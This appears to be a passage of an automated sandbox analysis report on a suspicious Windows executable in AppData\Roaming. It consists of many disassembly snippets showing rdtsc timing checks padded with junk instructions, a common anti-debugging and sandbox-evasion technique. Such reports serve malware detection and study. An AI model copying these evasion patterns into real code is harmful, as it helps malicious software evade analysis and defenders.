Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C2A7E second address: 5C2A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F95FD07A056h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C2A8E second address: 5C2A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7733 second address: 5C7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C1A second address: 5C6C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F95FD7D8996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C26 second address: 5C6C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6C2F second address: 5C6C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C6E92 second address: 5C6EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A066h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C713F second address: 5C7143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7143 second address: 5C714B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C714B second address: 5C7155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C7155 second address: 5C7159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C72C1 second address: 5C72CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EAF second address: 5C9EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EB9 second address: 5C9EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EBD second address: 5C9EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5C9EC9 second address: 5C9ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5CA1DB second address: 5CA212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F95FD07A066h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F95FD07A064h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E902 second address: 57E906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E906 second address: 57E913 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E913 second address: 57E918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57E995 second address: 57E99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D061F second address: 5D0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D0623 second address: 5D0635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F95FD07A056h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D8818 second address: 5D8853 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F95FD7D8996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F95FD7D8996h 0x00000013 jmp 00007F95FD7D89A6h 0x00000018 jmp 00007F95FD7D89A0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D8853 second address: 5D8865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95FD07A05Ah 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6AEE second address: 5D6B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F95FD7D8996h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C7C second address: 5D6C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C82 second address: 5D6C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F95FD7D899Eh 0x0000000d ja 00007F95FD7D8996h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6C9B second address: 5D6CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D6CA1 second address: 5D6CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7284 second address: 5D7290 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A056h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7290 second address: 5D72AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F95FD7D89A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7559 second address: 5D7567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F95FD07A056h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7567 second address: 5D756B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7FC9 second address: 5D7FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5D7FD1 second address: 5D7FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBBA second address: 5DDBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBBE second address: 5DDBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBC2 second address: 5DDBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBC8 second address: 5DDBCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DDBCD second address: 5DDBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F95FD07A056h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCC9B second address: 5DCCAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D899Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCDF0 second address: 5DCDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DCF87 second address: 5DCF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD10A second address: 5DD113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD288 second address: 5DD29F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F95FD7D899Ah 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD40D second address: 5DD446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A069h 0x0000000a jmp 00007F95FD07A063h 0x0000000f pushad 0x00000010 push edi 0x00000011 jmp 00007F95FD07A066h 0x00000016 pop edi 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD446 second address: 5DD44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD591 second address: 5DD5D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F95FD07A060h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 jp 00007F95FD07A056h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F95FD07A056h 0x00000021 jmp 00007F95FD07A065h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD5D2 second address: 5DD5EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD5EA second address: 5DD5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5DD858 second address: 5DD86A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F95FD7D8996h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E2014 second address: 5E2029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jo 00007F95FD07A056h 0x0000000f pop edi 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E2029 second address: 5E2054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F95FD7D89A8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E95FA second address: 5E960E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F95FD07A056h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E960E second address: 5E9612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98D1 second address: 5E98D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98D7 second address: 5E98E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E98E4 second address: 5E98FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9B75 second address: 5E9B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F95FD7D89A9h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9B93 second address: 5E9BA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jl 00007F95FD07A056h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9BA2 second address: 5E9BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F95FD7D8996h 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5E9BDC second address: 5E9BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5EA406 second address: 5EA40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5EA40D second address: 5EA414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2278 second address: 5F2291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95FD7D899Fh 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2291 second address: 5F2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F2296 second address: 5F229B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D3A second address: 5F1D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D3E second address: 5F1D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F95FD7D8996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D51 second address: 5F1D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D57 second address: 5F1D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D5B second address: 5F1D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1D61 second address: 5F1D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5F1FDB second address: 5F1FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 60637A second address: 606380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606380 second address: 6063AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ch 0x00000007 jmp 00007F95FD07A069h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6063AE second address: 6063B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061D0 second address: 6061FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A063h 0x00000007 jmp 00007F95FD07A060h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061FB second address: 6061FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6061FF second address: 606203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606203 second address: 606222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F95FD7D8996h 0x00000014 popad 0x00000015 jp 00007F95FD7D899Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 606222 second address: 606226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 607A6C second address: 607A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53BBCD second address: 53BBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jo 00007F95FD07A05Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD07A060h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53BBF5 second address: 53BBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 60EE59 second address: 60EE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C7A4 second address: 61C7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C7AE second address: 61C7CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A066h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B306 second address: 61B30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B30A second address: 61B30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B30E second address: 61B319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
